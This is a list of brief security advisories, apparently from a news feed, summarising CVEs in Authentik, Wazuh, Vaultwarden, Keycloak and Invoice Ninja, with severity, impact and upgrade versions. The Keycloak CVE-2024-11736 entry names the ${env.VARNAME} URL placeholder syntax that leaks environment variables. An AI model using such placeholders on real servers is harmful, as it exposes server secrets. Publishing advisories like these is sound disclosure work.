In Authentik versions before 2024.10.4 a medium severity vulnerability CVE-2024-11623 was detected. This vulnerability allows authenticated admin users to upload crafted SVG files, which can lead to stored XSS attacks through the application icons. To address this issue, users should upgrade Authentik to version 2024.10.4 or later. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2024-11623.
Read more Security
In Wazuh versions prior to 4.9.0 a high severity vulnerability CVE-2024-35177 was detected. This vulnerability allows attackers to gain full system access by placing malicious files in the Wazuh agent folder when installed in a non-default location. To fix this issue, users should upgrade Wazuh to version 4.9.0. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2024-35177.
Read more Security
In Wazuh versions up to and including 4.9.0 a medium severity vulnerability CVE-2024-47770 was detected. This vulnerability allows attackers to see the Wazuh agent list without permission, which could expose important system information. To fix this issue, users should upgrade Wazuh to version 4.9.1. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2024-47770.
Read more Security
In Vaultwarden versions prior to 1.33.0 a high severity vulnerability CVE-2025-24365 was detected. This vulnerability allows attackers to obtain owner rights of another organization if they know the ID of the target organization and are already the owner or admin of another organization. To address this issue, users should upgrade to version 1.33.0. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2025-24365.
Read more Security
In Keycloak versions 26.1.0 and prior a medium severity vulnerability CVE-2025-0604 was detected. This vulnerability allows attackers to bypass authentication by exploiting a flaw in Active Directory password resets, enabling users with expired or disabled AD accounts to regain access without proper LDAP validation. Currently, there is no fix version for this issue. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2025-0604.
Read more Security
In Invoice Ninja versions 5.8.56 through 5.11.23 a high severity vulnerability CVE-2025-0474 was detected. This vulnerability allows attackers to perform authenticated Server-Side Request Forgery (SSRF), enabling arbitrary file read and network resource requests as the application user. Currently, there is no fix version for this issue. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2025-0474.
Read more Security
In Keycloak versions prior to 26.0.8 a medium severity vulnerability CVE-2024-11736 was detected. This vulnerability allows admin users to access sensitive server environment variables and system properties through URLs. By using placeholders like ${env.VARNAME} or ${PROPNAME}, the server replaces them with actual values during URL processing. To address this issue, users should upgrade Keycloak to version 26.0.8 or later. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2024-11736.
Read more Security
In Keycloak version 21.0.2 a medium severity vulnerability CVE-2024-11734 was detected. This vulnerability allows attackers to disrupt the Keycloak service by modifying security headers, causing requests to fail and the service to become unavailable. To fix this issue, users should upgrade Keycloak to version 26.0.8. For more details, visit https://nvd.nist.gov/vuln/detail/cve-2024-11734.
In Vaultwarden versions before 1.32.5 a critical severity vulnerability CVE-2024-55225 was detected. This vulnerability allows attackers to impersonate users, including administrators, through a crafted authorization request. To address this issue, users should upgrade Vaultwarden to version 1.32.5 or later. For more details, visit https://avd.aquasec.com/nvd/2024/cve-2024-55225.
Read more Security